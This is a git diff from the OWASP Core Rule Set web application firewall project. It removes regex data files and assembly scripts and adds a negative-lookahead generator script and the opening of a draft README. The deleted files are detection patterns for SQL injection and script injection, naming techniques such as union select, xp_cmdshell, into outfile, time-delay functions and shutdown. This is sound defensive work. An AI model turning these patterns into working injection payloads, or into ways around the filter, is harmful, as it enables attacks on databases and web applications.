-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionrun[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunderflow[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunload[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupdateready[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupgradeneeded[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onuserproximity[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onussdreceived[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onversionchange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvoicechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvolumechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwaiting[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwarning[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwheel[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onzoom[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ping[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)src[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)style[\s\x08]*?= diff --git a/util/regexp-assemble/regexp-942120.data b/util/regexp-assemble/regexp-942120.data deleted file mode 100644 index 83668cc943..0000000000 --- a/util/regexp-assemble/regexp-942120.data +++ /dev/null 
@@ -1,21 +0,0 @@
-\!\=
-\&\&
-\|\|
->>
-<<
->=
-<=
-<>
-<=>
-\bxor\b
-\bregexp\b
-regexp\s+binary
-\bisnull\b
-\brlike\b
-rlike\s+binary
-not\s+between\s+0\s+and
-is\s+null
-like\s+null
-^in[+\s]*\([\s\d\"]+[^()]*\)
-\Win[+\s]*\([\s\d\"]+[^()]*\)
-<>\s+binary
diff --git a/util/regexp-assemble/regexp-942130.data b/util/regexp-assemble/regexp-942130.data
deleted file mode 100644
index 432281104b..0000000000
--- a/util/regexp-assemble/regexp-942130.data
+++ /dev/null
@@ -1,16 +0,0 @@
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?=[\s'\"`()]*?(?:\b\1\b)
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=>[\s'\"`()]*?(?:\b\1\b)
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?like[\s'\"`()]*?(?:\b\1\b)
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?rlike[\s'\"`()]*?(?:\b\1\b)
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?sounds\s+like[\s'\"`()]*?(?:\b\1\b)
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?regexp[\s'\"`()]*?(?:\b\1\b)
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?!=[\s'\"`()]*?(?!\b\1\b)[\d\w]+
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=[\s'\"`()]*?(?!\b\1\b)[\d\w]+
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>=[\s'\"`()]*?(?!\b\1\b)[\d\w]+
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<>[\s'\"`()]*?(?!\b\1\b)[\d\w]+
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<[\s'\"`()]*?(?!\b\1\b)[\d\w]+
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>[\s'\"`()]*?(?!\b\1\b)[\d\w]+
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?\^[\s'\"`()]*?(?!\b\1\b)[\d\w]+
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?is\s+not[\s'\"`()]*?(?!\b\1\b)[\d\w]+
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+like[\s'\"`()]*?(?!\b\1\b)[\d\w]+
-[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+regexp[\s'\"`()]*?(?!\b\1\b)[\d\w]+
diff --git a/util/regexp-assemble/regexp-942170.data b/util/regexp-assemble/regexp-942170.data
deleted file mode 100644
index 18d61e72bd..0000000000
--- a/util/regexp-assemble/regexp-942170.data
+++ /dev/null
@@ -1,6 +0,0 @@
-select\s+benchmark\s*?\(\s*?[(]?\s*?\w+
-;\s+benchmark\s*?\(\s*?[(]?\s*?\w+
-select\s+if\s*?\(\s*?[(]?\s*?\w+
-;\s+if\s*?\(\s*?[(]?\s*?\w+
-select\s+sleep\s*?\(\s*?[(]?\s*?\w+
-;\s+sleep\s*?\(\s*?[(]?\s*?\w+
diff --git a/util/regexp-assemble/regexp-942180.data b/util/regexp-assemble/regexp-942180.data
deleted file mode 100644
index 8ab41df92f..0000000000
--- a/util/regexp-assemble/regexp-942180.data
+++ /dev/null
@@ -1,21 +0,0 @@
-\d[\"'`]\s+[\"'`]\s+\d
-^admin\s*?[\"'`]
-(?:/\*)+[\"'`]+\s?
-(?:/\*)+[\"'`]+\s?--
-(?:/\*)+[\"'`]+\s?#
-(?:/\*)+[\"'`]+\s?/\*
-(?:/\*)+[\"'`]+\s?{
-[\"'`]\s*?or[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
-[\"'`]\s*?xor[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
-[\"'`]\s*?div[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
-[\"'`]\s*?like[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
-[\"'`]\s*?between[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
-[\"'`]\s*?and[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
-[\"'`]\s*?[^\w\s]?=\s*?[\"'`]
-[\"'`]\W*?[+=]+\W*?[\"'`]
-[\"'`]\s*?[!=|][\d\s!=+-]+.*?[\"'`(].*?$
-[\"'`]\s*?[!=|][\d\s!=]+.*?\d+$
-[\"'`]\s*?like\W+[\w\"'`(]
-\sis\s*?0\W
-where\s[\s\w\.,-]+\s=
-[\"'`][<>~]+[\"'`]
diff --git a/util/regexp-assemble/regexp-942190.data b/util/regexp-assemble/regexp-942190.data
deleted file mode 100644
index 3745cb1106..0000000000
--- a/util/regexp-assemble/regexp-942190.data
+++ /dev/null
@@ -1,20 +0,0 @@
-[\"'`]\s*?!\s*?[\"'`\w]
-[\"'`];?\s*?having\b\s*?[^\s]
-[\"'`];?\s*?select\b\s*?[^\s]
-[\"'`];?\s*?union\b\s*?[^\s]
-\s*?exec.*?\Wxp_cmdshell
-\s*?execute.*?\Wxp_cmdshell
-\wiif\s*?\(
-connection_id\s*?\([^\)]*?
-current_user\s*?\([^\)]*?
-database\s*?\([^\)]*?
-exec\s+master\.
-execute\s+master\.
-from\W+information_schema\W
-into[\s+]+dumpfile\s*?[\"'`]
-into[\s+]+outfile\s*?[\"'`]
-schema\s*?\([^\)]*?
-select.*?\w?user\(
-union select @
-union[\w(\s]*?select
-user\s*?\([^\)]*?
diff --git a/util/regexp-assemble/regexp-942200.data b/util/regexp-assemble/regexp-942200.data
deleted file mode 100644
index 44eff5141d..0000000000
--- a/util/regexp-assemble/regexp-942200.data +++ /dev/null @@ -1,14 +0,0 @@ -,.*?[)\da-f\"'`][\"'`][\"'`].*?[\"'`] -,.*?[)\da-f\"'`][\"'`](?:\r?\n)?\z -,.*?[)\da-f\"'`][\"'`][^\"'`]+ -\Wselect.+\W*?from -select\s*?\(\s*?space\s*?\( -create\s*?\(\s*?space\s*?\( -rename\s*?\(\s*?space\s*?\( -truncate\s*?\(\s*?space\s*?\( -load\s*?\(\s*?space\s*?\( -alter\s*?\(\s*?space\s*?\( -delete\s*?\(\s*?space\s*?\( -update\s*?\(\s*?space\s*?\( -insert\s*?\(\s*?space\s*?\( -desc\s*?\(\s*?space\s*?\( diff --git a/util/regexp-assemble/regexp-942210.data b/util/regexp-assemble/regexp-942210.data deleted file mode 100644 index 1dd373cb81..0000000000 --- a/util/regexp-assemble/regexp-942210.data +++ /dev/null @@ -1,40 +0,0 @@ -@.+=\s*?\(\s*?select -\d\s*?or\s*?\d+\s*?[\-+] -\d\s*?xor\s*?\d+\s*?[\-+] -\d\s*?div\s*?\d+\s*?[\-+] -\d\s*?like\s*?\d+\s*?[\-+] -\d\s*?between\s*?\d+\s*?[\-+] -\d\s*?and\s*?\d+\s*?[\-+] -\/\w+;?\s+having\W -\/\w+;?\s+and\W -\/\w+;?\s+or\W -\/\w+;?\s+xor\W -\/\w+;?\s+div\W -\/\w+;?\s+like\W -\/\w+;?\s+between\W -\/\w+;?\s+select\W -\d\s+group\s+by.+\( -;\s*?drop -#\s*?drop ---\s*?drop -;\s*?alter -#\s*?alter ---\s*?alter -;\s*?update\s*?\w{2,} -#\s*?update\s*?\w{2,} ---\s*?update\s*?\w{2,} -;\s*?insert\s*?\w{2,} -#\s*?insert\s*?\w{2,} ---\s*?insert\s*?\w{2,} -[^\w]SET\s*?@\w+ -and[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -nand[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -or[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -xor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -xxor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -div[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -like[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -between[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -not[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -\|\|[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] -\&\&[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] diff --git a/util/regexp-assemble/regexp-942240.data b/util/regexp-assemble/regexp-942240.data deleted file mode 100644 index 48d0701488..0000000000 
--- a/util/regexp-assemble/regexp-942240.data +++ /dev/null @@ -1,5 +0,0 @@ -alter\s*?\w+.*?character\s+set\s+\w+ -alter\s*?\w+.*?char\s+set\s+\w+ -[\"'`];*?\s*?waitfor\s+time\s+[\"'`] -[\"'`];*?\s*?waitfor\s+delay\s+[\"'`] -[\"'`];.*?:\s*?goto diff --git a/util/regexp-assemble/regexp-942260.data b/util/regexp-assemble/regexp-942260.data deleted file mode 100644 index 697ac400db..0000000000 --- a/util/regexp-assemble/regexp-942260.data +++ /dev/null @@ -1,22 +0,0 @@ -union\s*?\s*?[([]*?\s*?select\s+ -union\s*?all\s*?[([]*?\s*?select\s+ -union\s*?distinct\s*?[([]*?\s*?select\s+ -union\s*?[(!@]*?\s*?[([]*?\s*?select\s+ -\w\s+like\s+[\"'`] -like\s*?[\"'`]\% -[\"'`]\s*?like\W*?[\"'`\d] -[\"'`]\s*?and\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?nand\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?or\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?xor\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?xxor\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?div\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?like\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?between\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?not\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?\|\|\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?\&\&\s+[\s\w]+=\s*?\w+\s*?having\s+ -[\"'`]\s*?\*\s*?\w+\W+[\"'`] -[\"'`]\s*?[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w -select\s+?[\[\]()\s\w\.,\"'`-]+from\s+ -find_in_set\s*?\( diff --git a/util/regexp-assemble/regexp-942280.data b/util/regexp-assemble/regexp-942280.data deleted file mode 100644 index 5033a8200b..0000000000 --- a/util/regexp-assemble/regexp-942280.data +++ /dev/null @@ -1,7 +0,0 @@ -select\s*?pg_sleep -waitfor\s*?delay\s?[\"'`]+\s?\d -;\s*?shutdown\s*?; -;\s*?shutdown\s*?-- -;\s*?shutdown\s*?# -;\s*?shutdown\s*?\/\* -;\s*?shutdown\s*?{ diff --git a/util/regexp-assemble/regexp-942300.data b/util/regexp-assemble/regexp-942300.data deleted file mode 100644 index d35b538c94..0000000000 --- a/util/regexp-assemble/regexp-942300.data +++ /dev/null 
@@ -1,18 +0,0 @@ -\)\s*?when\s*?\d+\s*?then -[\"'`]\s*?# -[\"'`]\s*?-- -[\"'`]\s*?{ -\/\*!\s?\d+ -char\s*?\(\s*?\d -chr\s*?\(\s*?\d -and\s+\s*?\w+\( -nand\s+\s*?\w+\( -or\s+\s*?\w+\( -xor\s+\s*?\w+\( -xxor\s+\s*?\w+\( -div\s+\s*?\w+\( -like\s+\s*?\w+\( -between\s+\s*?\w+\( -not\s+\s*?\w+\( -\|\|\s+\s*?\w+\( -\&\&\s+\s*?\w+\( diff --git a/util/regexp-assemble/regexp-942320.data b/util/regexp-assemble/regexp-942320.data deleted file mode 100644 index f0c6158c02..0000000000 --- a/util/regexp-assemble/regexp-942320.data +++ /dev/null @@ -1,7 +0,0 @@ -create\s+function\s*?\w+\s*?\(\s*?\)\s*?- -create\s+procedure\s*?\w+\s*?\(\s*?\)\s*?- -declare[^\w]+[@#]\s*?\w+ -exec\s*?\(\s*?@ -procedure\s+analyse\s*?\( -;\s*?declare\s+[\w-]+ -;\s*?open\s+[\w-]+ diff --git a/util/regexp-assemble/regexp-942330.data b/util/regexp-assemble/regexp-942330.data deleted file mode 100644 index 222ca2dd53..0000000000 --- a/util/regexp-assemble/regexp-942330.data +++ /dev/null 
@@ -1,46 +0,0 @@ -[\"'`]\s*?or\s*?[\"'`]?\d -[\"'`]\s*?xor\s*?[\"'`]?\d -[\"'`]\s*?div\s*?[\"'`]?\d -[\"'`]\s*?like\s*?[\"'`]?\d -[\"'`]\s*?between\s*?[\"'`]?\d -[\"'`]\s*?and\s*?[\"'`]?\d -\\\\x(?:23|27|3d) -^.?[\"'`]$ -^[\"'`\\\\]*?[\d\"'`]+\s*?and\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?nand\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?or\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?xor\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?xxor\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?div\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?like\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?between\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?not\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?\|\|\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[\d\"'`]+\s*?\&\&\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?and\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?nand\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?or\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xor\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xxor\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?div\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?like\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?between\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?not\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\|\|\s*?[\w\"'`][+&!@(),.-] -^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\&\&\s*?[\w\"'`][+&!@(),.-] -[^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w -@\w+\s+and\s*?[\"'`\d]+ -@\w+\s+or\s*?[\"'`\d]+ -@\w+\s+xor\s*?[\"'`\d]+ -@\w+\s+div\s*?[\"'`\d]+ -@\w+\s+like\s*?[\"'`\d]+ -@\w+\s+between\s*?[\"'`\d]+ -@[\w-]+\sand\s*?[^\w\s] -@[\w-]+\sor\s*?[^\w\s] -@[\w-]+\sxor\s*?[^\w\s] -@[\w-]+\sdiv\s*?[^\w\s] -@[\w-]+\slike\s*?[^\w\s] -@[\w-]+\sbetween\s*?[^\w\s] -[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`]. -\Winformation_schema -table_name\W 
diff --git a/util/regexp-assemble/regexp-942340.data b/util/regexp-assemble/regexp-942340.data deleted file mode 100644 index 0d9d9a6fbe..0000000000 --- a/util/regexp-assemble/regexp-942340.data +++ /dev/null @@ -1,17 +0,0 @@ -in\s*?[(]+\s*?select -(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+regexp\s*?\( -(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+sounds\s+like\s*?[\"'`] -(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+[=\d]+x -[\"'`]\s*?\d\s*?-- -[\"'`]\s*?\d\s*?# -[\"'`][\%&<>^=]+\d\s*?= -[\"'`][\%&<>^=]+\d\s*?or -[\"'`][\%&<>^=]+\d\s*?xor -[\"'`][\%&<>^=]+\d\s*?div -[\"'`][\%&<>^=]+\d\s*?like -[\"'`][\%&<>^=]+\d\s*?between -[\"'`][\%&<>^=]+\d\s*?and -[\"'`]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`] -[\"'`]\s*?is\s*?\d.+[\"'`]?\w -[\"'`][|]?[\w-]{3,}[^\w\s.,]+[\"'`] -[\"'`]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`] diff --git a/util/regexp-assemble/regexp-942350.data b/util/regexp-assemble/regexp-942350.data deleted file mode 100644 index fb60a831f3..0000000000 --- a/util/regexp-assemble/regexp-942350.data +++ /dev/null @@ -1,11 +0,0 @@ -create\s+function\s+.+\s+returns -;\s*?alter\b\s*?[\[(]?\w{2,} -;\s*?create\b\s*?[\[(]?\w{2,} -;\s*?delete\b\s*?[\[(]?\w{2,} -;\s*?desc\b\s*?[\[(]?\w{2,} -;\s*?insert\b\s*?[\[(]?\w{2,} -;\s*?load\b\s*?[\[(]?\w{2,} -;\s*?rename\b\s*?[\[(]?\w{2,} -;\s*?select\b\s*?[\[(]?\w{2,} -;\s*?truncate\b\s*?[\[(]?\w{2,} -;\s*?update\b\s*?[\[(]?\w{2,} diff --git a/util/regexp-assemble/regexp-942370.data b/util/regexp-assemble/regexp-942370.data deleted file mode 100644 index 7edf306c0a..0000000000 --- a/util/regexp-assemble/regexp-942370.data +++ /dev/null 
@@ -1,19 +0,0 @@ -[\"'`]\s*?\*.+or\W*?[\"'`]\d -[\"'`]\s*?\*.+xor\W*?[\"'`]\d -[\"'`]\s*?\*.+div\W*?[\"'`]\d -[\"'`]\s*?\*.+like\W*?[\"'`]\d -[\"'`]\s*?\*.+between\W*?[\"'`]\d -[\"'`]\s*?\*.+and\W*?[\"'`]\d -[\"'`]\s*?\*.+id\W*?[\"'`]\d -\^[\"'`] -[\"'`]\s*?[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`] -[\"'`]\s*?[^\w\s]+\s*?[\W\d].*?# -[\"'`]\s*?[^\w\s]+\s*?[\W\d].*?-- -[\"'`].*?\*\s*?\d -[\"'`]\s*?or\s[^\d]+[\w-]+.*?\d -[\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d -[\"'`]\s*?div\s[^\d]+[\w-]+.*?\d -[\"'`]\s*?like\s[^\d]+[\w-]+.*?\d -[\"'`]\s*?between\s[^\d]+[\w-]+.*?\d -[\"'`]\s*?and\s[^\d]+[\w-]+.*?\d -[()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] diff --git a/util/regexp-assemble/regexp-942380.data b/util/regexp-assemble/regexp-942380.data deleted file mode 100644 index da4a07cf46..0000000000 --- a/util/regexp-assemble/regexp-942380.data +++ /dev/null @@ -1,19 +0,0 @@ -\b(?i:having)\b\s+\d{1,10}\s*?[=<>] -\b(?i:having)\b\s+'[^=]{1,10}'\s*?[=<>] -(?i:\bexecute\() -(?i:\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3}) -\bhaving\b ?\d{1,10} ?[=<>]+ -\bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+ -(?i:\bcreate\s+?table.{0,20}?\() -(?i:\blike\W*?char\W*?\() -(?i:select.*?case) -(?i:from.*?limit) -(?i:order\sby) -exists\s\sselect -exists\sselect\Sif\s\( -exists\sselect\Sifnull\s\( -exists\sselect\Stop -exists\sselect\Sconcat -exists\ssystem\s\( -exists\s\b(?i:having)\b\s+\d{1,10} -exists\s'[^=]{1,10}' diff --git a/util/regexp-assemble/regexp-942390.data b/util/regexp-assemble/regexp-942390.data deleted file mode 100644 index 4fff94b431..0000000000 --- a/util/regexp-assemble/regexp-942390.data +++ /dev/null @@ -1,12 +0,0 @@ -(?i:\bor\b ?\d{1,10} ?[=<>]+) -(?i:\bor\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+) -(?i:'\s+or\s+.{1,20}[+\-!<>=]) -(?i:'\s+xor\s+.{1,20}[+\-!<>=]) -\b(?i:or)\b\s+\d{1,10} -\b(?i:or)\b\s+'[^=]{1,10}' -\b(?i:xor)\b\s+\d{1,10} -\b(?i:xor)\b\s+'[^=]{1,10}' -\b(?i:or)\b\s+\d{1,10}\s*?[=<>] -\b(?i:xor)\b\s+\d{1,10}\s*?[=<>] -\b(?i:or)\b\s+'[^=]{1,10}'\s*?[=<>] -\b(?i:xor)\b\s+'[^=]{1,10}'\s*?[=<>] 
diff --git a/util/regexp-assemble/regexp-assemble-v2.pl b/util/regexp-assemble/regexp-assemble-v2.pl deleted file mode 100755 index cb0e677305..0000000000 --- a/util/regexp-assemble/regexp-assemble-v2.pl +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/env perl -# -# Create one regexp from a set of regexps. -# Regexps can be submitted via standard input, one per line. -# -# Requires Regexp::Assemble Perl module. -# To install: cpan install Regexp::Assemble -# -# See: https://coreruleset.org/20190826/optimizing-regular-expressions/ -# - -use strict; -use Regexp::Assemble; - -my $ra = Regexp::Assemble->new; -while (<>) -{ - # Handle possessive qualifiers - # https://rt.cpan.org/Public/Bug/Display.html?id=50228#txn-672717 - my $arr = $ra->lexstr($_); - for (my $n = 0; $n < $#$arr - 1; ++$n) - { - if ($arr->[$n] =~ /\+$/ and $arr->[$n + 1] eq '+') { - $arr->[$n] .= splice(@$arr, $n + 1, 1); - } - } - $ra->insert(@$arr); -} -print $ra->as_string() . "\n"; diff --git a/util/regexp-assemble/regexp-assemble.pl b/util/regexp-assemble/regexp-assemble.pl deleted file mode 100755 index a74b530f1a..0000000000 --- a/util/regexp-assemble/regexp-assemble.pl +++ /dev/null @@ -1,20 +0,0 @@ -#!/usr/bin/env perl -# -# Create one regexp from a set of regexps. -# Regexps can be submitted via standard input, one per line. -# -# Requires Regexp::Assemble Perl module. -# To install: cpan install Regexp::Assemble -# -# See: https://coreruleset.org/20190826/optimizing-regular-expressions/ -# - -use strict; -use Regexp::Assemble; - -my $ra = Regexp::Assemble->new; -while (<>) -{ - $ra->add($_); -} -print $ra->as_string() . "\n"; diff --git a/util/regexp-assemble/regexp-cmdline.py b/util/regexp-assemble/regexp-cmdline.py deleted file mode 100755 index 8189970110..0000000000 --- a/util/regexp-assemble/regexp-cmdline.py +++ /dev/null 
@@ -1,64 +0,0 @@ -#!/usr/bin/env python -# -# Convert a word list to a list of regexps usable by Regexp::Assemble. -# -# Examples: -# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl -# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# -# Refer to rule 932100, 932110, 932150 for documentation. -# - -import fileinput, string, sys - -# Convert a single line to regexp format, and insert anti-cmdline -# evasions between characters. -def regexp_str(str, evasion): - # By convention, if the line starts with ' char, copy the rest - # verbatim. - if str[0] == "'": - return str[1:] - - result = '' - for i, char in enumerate(str): - if i > 0: - result += evasion - result += regexp_char(char, evasion) - - return result - -# Ensure that some special characters are escaped -def regexp_char(char, evasion): - char = str.replace(char, '.', '\.') - char = str.replace(char, '-', '\-') - char = str.replace(char, '+', r'''(?:\s|<|>).*''') - # Unix: "cat foo", "catfoo" - char = str.replace(char, '@', r'''(?:[\s,;]|\.|/|<|>).*''') - # Windows: "more foo", "more,foo", "more;foo", "more.com", "more/e", - # "morefoo" - char = str.replace(char, ' ', '\s+') - # Ensure multiple spaces are matched - return char - -# Insert these sequences between characters to prevent evasion. -# This emulates the relevant parts of t:cmdLine. -evasions = { - 'unix': r'''[\\\\'\"]*''', - 'windows': r'''[\"\^]*''', -} - -# Parse arguments -if len(sys.argv) <= 1 or not sys.argv[1] in evasions: - print(sys.argv[0] + ' unix|windows [infile]') - sys.exit(1) - -evasion = evasions[sys.argv[1]] -del sys.argv[1] - -# Process lines from input file, or if not specified, standard input -for line in fileinput.input(): - line = line.rstrip('\n ') - line = line.split('#')[0] - if line != '': - print(regexp_str(line, evasion)) 
diff --git a/util/regexp-tricks/negative-lookahead.py b/util/regexp-tricks/negative-lookahead.py new file mode 100644 index 0000000000..0145ef39ec --- /dev/null +++ b/util/regexp-tricks/negative-lookahead.py 
@@ -0,0 +1,121 @@ +import argparse + +# WARNING: This script is EXPERIMENTAL. Use with caution. +# +# Known issues: +# * At the moment, it will probably not work with more than two strings. +# +# Known limitations: +# * Any substrings of a target string will also NOT be matched. This is probably due to a limitation in this technique, +# make sure that subtrings of the negative lookahead are not harmful in any way. + +parser = argparse.ArgumentParser(description="This script takes a list of strings and converts them into \ + a regex that acts like a negative lookahead") +parser.add_argument("strings", type=str, nargs='+', + help="the strings to convert into a negative lookahead") +parser.add_argument("--prefix", type=str, default="", + help="sets a prefix for the resulting regex") +parser.add_argument("--suffix", type=str, default="", + help="sets a suffix for the resulting regex") + +args = parser.parse_args() + +# Return the longest prefix of all list elements. Shamelessly copied from: +# https://stackoverflow.com/questions/6718196/determine-the-common-prefix-of-multiple-strings +def commonprefix(m): + "Given a list of pathnames, returns the longest common leading component" + if not m: return '' + s1 = min(m) + s2 = max(m) + for i, c in enumerate(s1): + if c != s2[i]: + return s1[:i] + return s1 + +# flatten returns a string with concatenated dictionary keys +def flatten(dict): + s = "" + + for key in dict.keys(): + s += key + + return s + +# set returns a character set containing the unique characters across all strings for the given index +def set(strings, index, flags): + dict = {} + + for s in strings: + # Continue so we don't panic + if index > len(s) -1: + continue + + dict[s[index]] = '' + + return "[" + flags + flatten(dict) + "]" + +# prepare converts a string for negative lookaheads emulation +def prepare(s, offset): + r = "" + + if len(s) == 0: + return r + + for i in range(offset, len(s)): + for j in range(0, i + 1): + if j == i: + r += "[^" + s[j] + 
"]" + else: + r += s[j] + + if i != len(s) - 1: + r += "|" + + return r + +# run runs the +def run(): + strings = args.strings + + r = "" + r += set(strings, 0, "^") + + c = "" + d = {} + + # Only find common string if we have more than one + if len(strings) > 1: + c = commonprefix(strings) + + # Collect all characters after the common substring from every string + for s in strings: + if len(s) > len(c) and s.startswith(c): + d[s[len(c)]] = '' + + # Add the common string to the regex to prevent accidental matching + if len(c) > 0: + if len(c) > 1: + r += "|" + "(?:" + prepare(c, 1) + ")" + + r += "|" + "(?:" + c + "[^" + flatten(d) + "]" + ")" + + for s in strings: + g = "" + + # When the common string is > 0, offset with len(c) + 1 because we handled this earlier + if len(c) > 0: + g = prepare(s, len(c) + 1) + else: + g = prepare(s, 1) + + # Add OR boolean if necessary + if len(g) > 0: + r += "|" + + r += g + + print(args.prefix + "(?:" + r + ")" + args.suffix) + +# Only run if script is called directly +if __name__ == "__main__": + run() diff --git a/util/rule_ctl/README.md b/util/rule_ctl/README.md new file mode 100644 index 0000000000..374b37e17c --- /dev/null +++ b/util/rule_ctl/README.md @@ -0,0 +1,135 @@ +draft + +# OWASP CRS Rule Control Script +This script aims to help when a bulk change on configuration 